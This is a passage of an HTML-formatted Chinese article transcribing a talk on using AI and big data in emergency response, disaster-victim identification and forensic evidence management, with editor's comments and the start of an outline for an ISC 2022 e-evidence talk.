  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">事故发生，通常有海啸、天气不好，雾霾，或有一些有奇很奇怪的味道，或者很多人进医院，或者很多牛马羊死亡。这些发生之后通常有一些叫做indicator， indicator 就是告诉我们可能有事故发生。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">假如有人工智能能够及时结合所有的数据，马上拿到分析一下，有重大事故发生了，马上进行initial notification。</span></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">快速响应和通信系统的重要性</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">事故发生了，那我们怎么样去处理？病人送到哪里救援？救援人员从哪里来？需要哪方面的专家？所以这个 communication 系统又变得很重要。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">好像现在我们如果在海边，天气预报三天之前就会通知到你家里的电话或者你的手机，告诉你飓风要来了，第二天到当天，它会不断的告诉你要离开海边，要撤退。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">人工智能可以马上会收集、研判、规划、指挥和通知。所以 initial notification 很重要。怎么用最快的时间传递最正确的消息？从报纸、电视上，能够通知所有的居民，所以这个人工智能的通讯是一个很重要的设计。美国自从 911 之后，<span style="mso-spacerun:yes;">  </span>homeland security即有国土安全部，收集所有的信息，然后分析、研判、通知 。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】实战是检验的唯一标准。采集、分析信息成本高昂，如何判定措施有效？</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">7. 应急救援资源的智慧指挥官:AI的妙用</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">快速响应和通信系统的重要性</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">接下来怎么样去救援？假如有炸弹威胁，或者有针对警察的陷阱，你不小心的话自己撤退都撤出不出来。所以一定要有一个人工智能系统，告诉到现场的安全人员，怎么样注意他们自身的安全。还有救援怎么分组，需要哪些角色，怎样分配。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">另外指挥中心要定在哪里？人工智能也要采集天气包括风向，假如是危化品，指挥中心在下风怎么办？所以通常指挥中心要有一个hot，一个 warm，一个cold，人工智能也要做出选址和启用建议。</span></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">资源规划和社会资源调度</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">资源规划方面，关键是procedure 操作程序，现在国外已经开始有标准操作程序。假如给全资料库，人工智能分析好了，你很快的就能够调人、调资源了。展开说一下：</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000684" data-ratio="0.35853976531942633" data-type="png" data-w="767" height="146.0" width="408.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=faddd213&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAwibicJSZeibvntUGIdRRGBoVTW7jEDibIS7lkTj6QQMwbqBgiar8TmwG9Wg%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">应该用什么样的资源做准备，人工智能要分析和优化，好像在南沙有多少救援队员，有多少防毒面具，能力不够的话，最近的城市是什么？最远的地方能要多少？协商启用程序是什么，所以这些 protocol 现在都要有。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">怎么样 manage<span style="mso-spacerun:yes;">  </span>equipment和 manpower，还有警犬，假如说在这里有一个事故，你最近的警犬队在哪里？能够借调多少警犬？</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">社会资源调度能力很重要，交通，资源，facility？印尼海啸，南斯拉夫战争，成千上万具尸体，没有那么多冰箱，存放也是大问题，许多重大事故很多尸体没有鉴定出来。社会资源准备阶段，就要知道（有大规模冷冻能力的）屠宰场在哪里，有制冷功能的卡车有多少辆，制造干冰的工厂也是不错的暂时措施，然后你再去调的话，你可以调动，所以一定要预防规划准备，维护资料库。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">8. 物证管理与身份鉴定:AI成为无声助手</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">物证编号和安全保护</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">一个人工智能系统的方法能帮你，这些收集的物证要怎么样编号，有些东西要保障工作人员安全，尤其是生物事件，你在进出现场怎么样保护安全？</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">所以这些东西是完全是个团队，有各种专业的人员，所以在很早之前就能够统计需要消防人员多少，医护人员多少。甚至退休专家怎么找？或者如何找企业协助，包括化学战，电力与医疗生物，物证怎样找回？除了死者身份鉴定，我们要怎么样找到遗物并能够发给被害人家属？</span>    <o:page></o:page></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">多种鉴定方法和数据库的应用</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">可以有很多不同鉴定的方法，这个也是一个资料库，采集之后放到资料库，包包、指纹、脸型重建， birthmart 出生身上胎记，这些information，或者开刀或者牙齿的拍照，医院的 x 光片，这些都可以做一个大的数据库，将来做这个鉴定、分发工作会高效很多。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】数字化、信息化的典型过程，一线实战经验，很形象</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">9. 从911到马航的教训:严谨鉴定的重要性</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">911事件的教训</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">911 有个案例，当时我们派了两个警犬救援队，大部分人都罹难去世了。但是当时鉴定尸体发生很多错误，家属发现（遗物遗体）错的离谱，原来他们就是照穿的衣服里面的证件或者名牌，那个是最不准确的，救援人员因为情况紧急临时拿了别人的衣服，所以现在就规定</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">一定要遵循严格鉴定的方法</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。当时我们派了 18 个 DNA 的人员协助他们，因为很多比较复杂，例如有些人没有标准的 DNA 了，那只有从他的车辆、牙刷这些东西去找出DNA，然后做了一个资料库。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">还有战争，当时联合国要求我们协助去鉴定，当时鉴定的时候也是用这些，当然没有现在的科技这么好，就是要有资料。要做到死者家属告诉我们他的孩子是什么样子，穿什么衣服，什么鞋子，要收集记录这些特征或人性化查询需求，然后我们先前鉴定数据也有个资料库，要写程序让</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">两个资料库比对能够match</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。当时联合国、当地政府因为感激，感谢我们协助，给我们发了勋章。</span></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">马航失事调查的启示</span>
  </h3><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">另一个案例，马航飞机失事，当时我们去协助他们 300 多人。通常我们看到这么多碎片就知道是高空爆炸，怎么样先给物证找齐，然后去还原，这些尸体有多少有指纹的？然后从他们的DNA或者鞋子都要做记录，都可以做分析。</span></p><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">10. 破案利器:大数据、AI与人类智慧的完美结合</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">大数据与人工智能的结合</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000685" data-ratio="0.3771353482260184" data-type="png" data-w="761" height="152.66998291015625" width="406.6700439453125" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=033ea264&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAM815xaAgpGD935LTkG3uBTNSibiaygqmNY8YtBOwicjmQOibVZn3j2CrTw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">data mining engine 变成很重要的一个，在人工智慧上，除了大数据库之外，你怎么样有一个 engine 能动 mine 这些data？通常要用几种不同鉴定方法，包括二代dna测序技术，增加数据，然后去 mining 。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">除了鉴定人体，鉴定爆炸物也要靠大数据库、人工分析、实验室特殊分析。假如我年轻 30 年，我一定好好用功去做数据分析，现在年纪大了只能讲，内容很多，将来 3D<span style="mso-spacerun:yes;">  </span>image 也可以用到人工智慧分析。所以调查的时候，</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">之前类似的一般的案件的 package，对以后碰到突发事件也是很有用的</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">今天因为时间的关系，我们没有时间一个个讲，但是这个 big data 大数据库跟人工智能是贴合的，非常重要。人工失踪在美国很严重，那些失踪的人到底是谁？有这个基础很容易就鉴定。假如有这个基础，海地海啸也很容易善后，飓风，龙卷风，水土流、水石流、爆炸案件，马航等灾难，也不会到现在好多情况我们不知道。</span></section><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">群众的重要性</span>
  </h3><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">2013年波士顿马拉松爆炸案。这场恐怖袭击造成3人死亡，数百人受伤。警方通过监控录像和目击者的手机视频迅速确认了两名嫌疑人——萨尔纳耶夫兄弟。在逃亡过程中，他们劫持了中国留学生邓俊杰的车，但邓俊杰在加油站成功逃脱并报警，提供了关键线索。警方随后在激烈的枪战中击毙了塔梅尔兰，并在全城封锁、高空高清侦测、和市民合作下最终抓获了躲在没人能想到的角落的焦哈尔。称这个案件为幸运，因为在关键时刻，市民的勇敢行为和警方的迅速反应起到了决定性作用。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">所以人工智能是很重要的一块，但是一个团队做，</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">一定要有现场人员、专业人员跟一些专门电脑技术的能结合在一起</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">，我们知道应该怎么做，但是你让我写程序，我写不出来，但你的程序写好了我可以运用，告诉你哪里不对哪里对。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">最后要谢谢有关单位邀请，因为我今天实在很累了，坐了 15 个小时的飞机，到了香港早上 4 点钟，然后马上坐车到这边，我还没有停下来，谢谢各位，谢谢。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】通篇没有造概念，没有新术语，警界科技就是这么平实，平实到5年之后的AI，也要仰望这些场景、能力、需求。</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style=""><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">附2：李昌钰博士ISC 2022演讲</span></strong></span>
  </h1><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">*在线视频 isc.n.cn</span></p><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">开启鉴识之门</span>
  </h2><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">Applying forensic fundamentals to the collection of e-evidence</span>
  </h2><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">互联网安全是世界性的</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">网络犯罪是一个很重要的课题</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">怎么调查？有什么注意事项？</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">要将传统的现场，跟电脑的现场结合起来</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">现场调查的思维方法转变</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">从转移理论发展到联系理论</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">新兴物证科学和网络安全结合</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 